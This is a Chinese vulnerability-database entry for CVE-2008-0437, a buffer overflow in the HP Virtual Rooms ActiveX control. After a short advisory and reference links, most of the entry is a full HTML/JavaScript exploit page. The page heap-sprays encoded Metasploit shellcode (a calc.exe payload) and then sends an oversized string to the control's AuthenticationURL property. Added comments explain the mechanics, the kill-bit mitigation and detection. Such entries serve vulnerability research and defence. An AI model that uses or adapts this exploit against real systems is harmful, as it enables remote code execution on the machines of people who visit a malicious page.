HP Virtual Rooms hpvirtualrooms14 ActiveX控件多个缓冲区溢出漏洞

漏洞ID 1114376 漏洞类型 缓冲区溢出
发布时间 2008-01-22 更新时间 2008-09-05
CVE编号 CVE-2008-0437 CNNVD-ID CNNVD-200801-370
漏洞平台 Windows CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/4959
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200801-370
|漏洞详情
HP Virtual Rooms是一套在线协作、培训和支持工具。HP Virtual Rooms的ActiveX控件实现上存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞控制用户系统。HP Virtual Rooms的WebHPVCInstall.HPVirtualRooms14 ActiveX控件(HPVirtualRooms14.dll,CLSID 00000014-9593-4264-8B29-930B3E4EDCCD)没有正确地验证分配给AuthenticationURL、PortalAPIURL、cabroot等属性的字符串长度,如果用户受骗访问了恶意站点,而该站点对这些属性分配了超长字符串的话,就可能触发缓冲区溢出,导致执行任意指令。
|漏洞EXP
<!-- 
HP Virtual Rooms WebHPVCInstall Control Buffer Overflow Exploit
written by e.b.
Note that I did not have time to work out some heap fragmentation issues so this code is NOT reliable...
Tested on Windows XP SP2(fully patched) English, IE6, hpvirtualrooms14.dll version 1.0.0.100
Thanks to rgod, h.d.m. and the Metasploit crew 
-->
<html>
 <head>
  <title>HP Virtual Rooms WebHPVCInstall Control Buffer Overflow Exploit</title>
  <script language="JavaScript" defer>
    // Proof-of-concept trigger for CVE-2008-0437 (HP Virtual Rooms
    // WebHPVCInstall / HPVirtualRooms14 ActiveX control). Invoked from the
    // body onload handler. It first fills the browser process heap with
    // many copies of a NOP-sled + shellcode block, then assigns an
    // oversized string to the control's AuthenticationURL property, which
    // the advisory above says is copied without a length check.
    // Mitigation: apply the vendor update, or set the IE kill bit for
    // CLSID 00000014-9593-4264-8B29-930B3E4EDCCD so the control cannot be
    // instantiated from a web page. Detection: a script that unescape()s
    // long %u-encoded strings into a large array and then assigns a
    // multi-kilobyte string to an ActiveX property is a well-known
    // heap-spray pattern for web proxies and endpoint AV to flag.
    function Check() {
     
   


// win32_exec -  EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com 
// Per the generator line above: a 378-byte Alpha2-encoded payload that
// launches calc.exe. Each %uXXXX escape decodes to one UTF-16 code unit,
// so the bytes land in memory exactly as the string is stored.
var shellcode1 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +
                          "%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" +
                          "%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" +
                          "%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" +
                          "%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" +
                          "%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f" +
                          "%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b" +
                          "%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c" +
                          "%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831" +
                          "%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955" +
                          "%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b" +
                          "%u726c%u4c6b%u534b%u376f%u636c%u6a31%u4e4b%u756b" +
                          "%u6c4c%u544b%u4841%u4d6b%u5159%u514c%u3434%u4a44" +
                          "%u3063%u6f31%u6230%u4e44%u716b%u5450%u4b70%u6b35" +
                          "%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530" +
                          "%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b" +
                          "%u6c30%u5770%u5770%u4770%u4c70%u704b%u4768%u714c" +
                          "%u444f%u6b71%u3346%u6650%u4f36%u4c79%u6e38%u4f63" +
                          "%u7130%u306b%u4150%u5878%u6c70%u534a%u5134%u334f" +
                          "%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377" +
                          "%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f" +
                          "%u4147%u4163%u504c%u4273%u3159%u5063%u6574%u7035" +
                          "%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653" +
                          "%u314e%u7475%u7038%u7765%u4370");



	// 0x90 is the x86 NOP opcode; this two-unit seed is doubled below
	// into a sled that precedes the payload in every sprayed block.
	var bigblock = unescape("%u9090%u9090");
	// Assumed per-string allocation overhead, in UTF-16 units. The sled
	// is trimmed by headersize + shellcode length so that a whole
	// sled + payload allocation comes out at roughly 0x40000 units.
	var headersize = 20;
	var slackspace = headersize + shellcode1.length;
	while (bigblock.length < slackspace) bigblock += bigblock;
	var fillblock = bigblock.substring(0,slackspace);
	var block = bigblock.substring(0,bigblock.length - slackspace);
	// Grow the sled until sled + slack reaches at least 0x40000 units
	// (512 KiB of UTF-16 storage).
	while (block.length + slackspace < 0x40000) block = block + block + fillblock;

	

	// The spray itself: 700 copies of sled + payload, about 350 MiB in
	// total, so the payload sits at the same offset in every block.
	// Note that `i` is never declared with var, so it leaks as an
	// implicit global of the page.
	var memory = new Array();
	for (i = 0; i < 700; i++){ memory[i] = block + shellcode1 }
		
	// Overflow string: 15000 x 4 units of 0x0A0A, i.e. 60,000 UTF-16
	// units. Presumably 0x0A0A0A0A is meant to fall inside the sprayed
	// region once it overwrites a pointer — the page shows no crash
	// details, so treat that as an assumption.
	var buf = "";
	for (i = 0; i < 15000; i++) { buf = buf + unescape("%u0A0A%u0A0A") }

	// The trigger. The advisory lists PortalAPIURL and cabroot as
	// further properties of the same control with the same missing
	// length check.
 	obj.AuthenticationURL = buf;  
 } 
   
   </script>
  </head>
 <body onload="JavaScript: return Check();">
    <object id="obj" classid="clsid:00000014-9593-4264-8B29-930B3E4EDCCD">
     Unable to create object
    </object>
 </body>
</html>

# milw0rm.com [2008-01-22]
|参考资料

来源:BID
名称:27384
链接:http://www.securityfocus.com/bid/27384
来源:VUPEN
名称:ADV-2008-0236
链接:http://www.frsirt.com/english/advisories/2008/0236
来源:SECUNIA
名称:28595
链接:http://secunia.com/advisories/28595
来源:FULLDISC
名称:20080122 HP Virtual Rooms WebHPVCInstall Control Multiple Buffer Overflows
链接:http://marc.info/?l=full-disclosure&m=120098751528333&w=2
来源:XF
名称:hpvirtualrooms-hpvirtualrooms14-activex-bo(39836)
链接:http://xforce.iss.net/xforce/xfdb/39836
来源:MILW0RM
名称:4959
链接:http://www.milw0rm.com/exploits/4959